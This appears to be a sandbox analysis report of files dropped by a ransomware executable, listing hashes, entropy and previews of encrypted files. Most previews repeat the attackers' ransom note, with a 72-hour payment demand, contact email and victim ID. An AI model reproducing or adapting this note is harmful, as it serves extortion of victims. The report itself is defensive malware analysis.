                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1200
                                                                                            Entropy (8bit):7.85385328986685
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:Uu7wr/9N3PQGccMo7EtZdZ8wzIsY9oS8EHjnIdt2WnKAvv11ZQW3qE06W+H:Uewj3IGP76wkNBSVHejFv91qkP
                                                                                            MD5:B2DEB755D1AEE1767A0CDCF541C96542
                                                                                            SHA1:94B6603DCF8B678754FF97783A3BD393249037B6
                                                                                            SHA-256:89D749A3D41146B6135B07620EF3B2084B97572B5BD4E41ECEA7179E35C4155F
                                                                                            SHA-512:FF2DA7343FF2ACDF46502E903CB930F8FDB0DA0D7FE433E5570E09056826FDF750DD81AD8D89AEB9617DD52D7E6791BA4D197B9888EBEC92FB2C4F8BFB2B8525
                                                                                            Malicious:false
                                                                                            Preview:.(.|.c5...sM..9..K\.u>}8..m..N.i..n...[].C\!.9N..!...*.........c.51..'...3...O...../..Cf...-g.....]Y...+)..{.@M.".".Z.K.`qK.{.<HG:.T..Z[./>....x.^2$.N\...G....B..)..Evd-f..F`.[.....4.....Q..Z..g...@..8..'.e..o#oE.Q....|..c.ab.M...:....p..)..tm..] ].....1..1......y.yR.D.b.......`..c.J..;>..y.Y.A..w$.@.....L...<FH.....C...4&..E9..w. .Q..-Y.k./......!....SZ9s.2.n....A/.....}.b.....i..}<".i...-....r.P:.....X_.I.|.%.5...`.S..A.2.Y.WK..@..x.. ..2=....k.......g.d^..4. ...~..:..`_i~it...K.B.#..k.OQU....$.?..t..!42..Aq.......M@N.].nR.[....:..OV..2`...8.A.6...w/........;.p...yN5i.........CZ. ....d#8....L.......W..(.H..G...`'.+.....+...\......+a .G..`tG-VE.[&.%.4..-.)6.[..z..z.d..h.c.?r_..S..o&....M...K.....v............(..f\.w....UQ..>B2...c).1.?/..'.[.if.......m..:.n.U..,..u..E@r..x..;.`....._M..r..3S..u..!..;.E.f+w.u(K......T.&.}.KF....KJ.}....Q....&.v..e..^!@].|.......1.0..a3-2.....:*.Hh......O....1......K.xL..r./.Z.I.............C.....[..&..A.`..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):67950
                                                                                            Entropy (8bit):7.850277333977642
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:nGHGpcGrjw2RAal82F5EwtJqF1WlDBGOFBbVEmS:nGmprs2RARw5JqFoJnbhS
                                                                                            MD5:BF4F50F43AEBEDB4A994CD79E8ECC659
                                                                                            SHA1:69BEE16B9DA439AC98BE7F4AEB1579E8C8AB08E2
                                                                                            SHA-256:AEB2CB125D2D164A827CB42F9213F896E377BD08C3F93B59533AD2A21CC3ED1F
                                                                                            SHA-512:44ABB23E90122CCA28B2C5FEC1030D2C8264AFC2893789A2ED88D24B32736BEE3B53F4F6BB0521EF98E966A50BFC46D5528A362D9E2E91E004D7476FFD19F43E
                                                                                            Malicious:false
                                                                                            Preview:^/P........?1s.6.A...,4r*.a..D..X....M....~H...?...<*.W...~).=$.T..V....6.......;...=. O....5.... Me.3OJ,.....&M]u..G).........&.Xd^{..>.|.nl..wp@...QFU1.t~.Zu......GF...nC7......4..C..r"ZV..Kzw...tA..k...p....tl7.5....D\.:......\....m...,S.h.........w.....U.Y.V..<L..f..........l4..0....a.....6.+..f_..{.b..|..Z....i.......kG[|d.`@,...l...i...........h...gZ..+...'D|.DK..lHE.Z|..{..;...t...~.QI..Xq.!-.A.cp....E..g..U.A..vM.A.O3"p.<%..p9.X..%...-.s\.+..7..H.....xMA..4.b.Z....}...?..y...s...... 8.+..]L...<....}...+x.%..d..Im...p3.hi...Dw..,f.....)*.5W.$39%U.&.V...9!m.U.UQ.p.~jo..-j...JG...Q:...._.2.&...k.SO....z..Z.g.`..h..#<.pU.[q.n.?!M.&\.;. ....2....\...PdN.'.o...c.2...J.r.....]...K....o...>...}......Cd..~iS...Ok.w....rl%..Q"-.hz.5_..5...(...nZ.$...]iM..@76..cf.V....S...D...h.P.. ..oC...*....Z3............W..<.-gB.og..Ri0.M;F.....T.[...I.ZZT..#u\pL.*..C.!."0.a...&$.4..M..Pl....TU....u.'.Ygij.tA7J,...NI.......0k....\4.;k=.I.HC]...~Ux....Ti.^[I..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):112129
                                                                                            Entropy (8bit):7.710454254544199
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:/m94jIUDIVYNhZBIDt9KFHgoYF0gOY0yLEJdUjMcpB:YfAZsVFF0gOjymdY1
                                                                                            MD5:3C89714F1D70FA2A2134602CC7B3D5B8
                                                                                            SHA1:37B0E3C11D71AF1FB6731FA6898CF2649E133EEA
                                                                                            SHA-256:70F3DBE3C3FB8D933ECB7C98A08414E46D2585F5019DBB319E953D74E81531DF
                                                                                            SHA-512:0E2A823968829A1A2EEE426FC93DE7F3E79C6AC377289E70DD3FA207DFEF48A9298D087F8E512EE0E6BD1F367CBF68E6DE5F21A27DA8D034A25968709268D276
                                                                                            Malicious:false
                                                                                            Preview:.8..Gec..x.J7u|.....x..o0......P..2d.4I...8.....^C;...L.c....A...]..]'.W....).......Cv...N..X...k?..c3....<B.UU.V..liz.......T*H{Z...%...q?.......O....k..pq..T.6.....R..uM'.p .....0..J../0`-b.^.....[...a.._GP...k2....c..."...L...^..K.[....Y.6.,s..&a..+.N.q...$.. F..jCwN .....)G.U.......%s... j.Ua...T#...n/..%_.9U.1ubh8!\=..=...H..d.fe.../.M]9.O.rO...n..P7....-B.y..0..).!<{p)DJ.]..v|L...`.d.0...t.i..F...J.W......z6..!..b.5....dj"W....B&..MH..9.Ah#..^.r.c..GQ..!..:fC...HX.?..:e:.9OeP.....Tn.mb.....d.....r|M.L.N.c...J.i5.j+....`.{&.<6.".I...6....uh.K....f...ns..Z........m......G.m.B....3.-..>.uns*.d..cN..N.Q.....r{N.R.........S..f...V#NF.....L..U.D0'.1.C....5.0..B.~R....1.E.....q/A].h-...............}yda.."|9H..2.[......|yI...Z..8...Md..m....Q.sW`..e..X..w8..$.R}.v.@7:..IP..X1..\.^.Ojv...`.0....*F.$H..........8g9...td.....WJ'%.w....@..G....!Wq./d^..b.N.a.5.@Y.x.m...U..*<...H..(n(..hx....._...B...)$.XIA.j.g&i..W............nN.../...je.n=
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:true
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):313
                                                                                            Entropy (8bit):7.293974519679588
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:KlYQXLR8HNuNEVjRwG1Yd0fRjlDVjuFOOW/01oGY+dTcckxqTLESn:va8HINaVwG1YYRjLuFw+AckwTn
                                                                                            MD5:BEE36173FAD61D8BF67A58066BBBF222
                                                                                            SHA1:AE9100FE97615D3BD7C919EFD6265F919F295648
                                                                                            SHA-256:09B2B917CC03CCBD5B0104DFEFBAFAD669B5A1B4E561EFC7B55C8D5002535E91
                                                                                            SHA-512:E3F810C90CE251B5B69089099FB99982F9C1D0FF8CC96BF99657CAD2EC569226F14DE537701CA37B42EAEA2728B0135EECA757A27F093DDAF5BB3357C646BD1C
                                                                                            Malicious:true
                                                                                            Preview:..:2NV..&..F{<y.{..=0..Q..|5.8..stUse": null.}.l.u.7..w....O.....$...U9......9w......[.....+...+.L...G...[n.E...:..N`2t.......D..'yx.....n.......S.g..V0............$..W.w....,.;x.?,..r0....j.!bXs....P.u~.AG..+.Z.w.#....=....Z.....R..`..v.@..].K.Y.z...Ov...../........'..M...y.W.u.:R.bx..-0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):420
                                                                                            Entropy (8bit):7.506530839377849
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:U5MwRtnMhud8S8lxdnb6PbfZk0P46glnQH1LpSn:UJvMkSS8lxdnb6Pbu7+H1LpS
                                                                                            MD5:FE9FB11962F506AC25A73AC5CCD78063
                                                                                            SHA1:8104A8D4D1F65A54303B5C5BD0194A7384B3851B
                                                                                            SHA-256:E40B41FCAF6CC9D339413FB06B273F614579C580F085A534667870B590290012
                                                                                            SHA-512:6AEF2269CC4AE30C989CDE724942C3B289833DA002C4E01ADECA8F8FAD876A26FD80F6A1EEA09F42F07F1980095E2BCA4BAD48C5572F65CC338D125ED4B5D5EE
                                                                                            Malicious:true
                                                                                            Preview:.}...&r.~.^_8...Q..v....c.K....J.......d.Q.Z.....8.6SQ[N..j..=.J9..$....s.$...!.i.......*.V.77..........ua..u.^..ynq..a.hR.-.@&.4.=.:n::|n:y:.W......tCr.c.4...(N....8w.ZM.O5.M|!.hG../(..%.^..e.^!B......w!.B.. 8.7G....x.%p$..+1...'...'>I.?._.J........Ty.C.@.l.F.q..z.&.U.."......./...~.G.V...[[..b~.3...6.eJ..%"...{... /$.....J.......4....:h.p7...|S.g.x.u...^......M..r..8Ok..-2.....i`0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
